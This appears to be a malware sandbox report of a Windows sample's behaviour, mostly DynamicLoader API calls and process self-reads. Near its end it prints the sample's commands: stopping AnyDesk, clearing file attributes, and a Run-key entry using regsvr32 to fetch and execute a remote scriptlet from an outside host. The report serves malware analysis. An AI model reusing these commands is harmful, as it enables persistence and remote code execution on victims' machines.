- DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: ole32.dll/CoGetClassObject - DynamicLoader: ole32.dll/CoGetCallContext - DynamicLoader: ole32.dll/StringFromGUID2 - DynamicLoader: ole32.dll/CoImpersonateClient - DynamicLoader: ole32.dll/CoRevertToSelf - DynamicLoader: ole32.dll/CoSwitchCallContext - DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW

Page 10 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: sechost.dll/LookupAccountNameLocalW

Page 11 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

Page 12 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

Page 13 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- self_read: process: b.exe, pid: 1196, offset: 0x00000000, length: 0x00000007 - self_read: process: b.exe, pid: 1196, offset: 0x00000000, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00000007, length: 0x0004a667 - self_read: process: b.exe, pid: 1196, offset: 0x00001ff0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00003fe0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00005fd0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00007fc0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00009fb0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0000bfa0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0000df90, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0000ff80, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00011f70, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00013f60, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00015f50, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00017f40, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00019f30, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0001bf20, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0001df10, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0001ff00, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00021ef0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00023ee0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00025ed0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00027ec0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00029eb0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0002bea0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0002de90, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0002fe80, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00031e70, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00033e60, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00035e50, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00037e40, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00039e30, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0003be20, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0003de10, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x0003fe00, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00041df0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00043de0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00045dd0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00047dc0, length: 0x00002000 - self_read: process: b.exe, pid: 1196, offset: 0x00049800, length: 0x00000031 - self_read: process: b.exe, pid: 1196, offset: 0x00049819, length: 0x00000e55 - self_read: process: wscript.exe, pid: 1496, offset: 0x00000000, length: 0x00000040 - self_read: process: wscript.exe, pid: 1496, offset: 0x000000f0, length: 0x00000018 - self_read: process: wscript.exe, pid: 1496, offset: 0x000001e8, length: 0x00000078 - self_read: process: wscript.exe, pid: 1496, offset: 0x00018000, length: 0x00000020

Page 14 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- self_read: process: wscript.exe, pid: 1496, offset: 0x00018058, length: 0x00000018 - self_read: process: wscript.exe, pid: 1496, offset: 0x000181a8, length: 0x00000018 - self_read: process: wscript.exe, pid: 1496, offset: 0x00018470, length: 0x00000010 - self_read: process: wscript.exe, pid: 1496, offset: 0x00018640, length: 0x00000012 A process created a hidden window

- Process: wscript.exe -> C:\Windows\Web\c3.bat A scripting utility was executed

- command: "C:\Windows\System32\WScript.exe" "C:\Windows\web\n.vbs" Uses Windows utilities for basic functionality

- command: C:\Windows\Web\c3.bat - command: net stop AnyDesk - command: sc config AnyDesk start= disabled - command: attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe - command: attrib -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe - command: attrib -s -h -r C:\Users\Default\AppData\Roaming\*.exe - command: attrib -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe - command: attrib -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe - command: attrib -s -h -r C:\Users\asp\AppData\Roaming\*.exe - command: attrib -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe - command: attrib -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe - command: attrib -s -h -r C:\Users\administrator\AppData\Roaming\*.exe - command: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll" /f - command: reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f - command: C:\Windows\system32\cmd.exe /S /D /c" echo y" SetUnhandledExceptionFilter detected (possible anti-debug)

Page 15 Date: 2021-09-25 18:50:51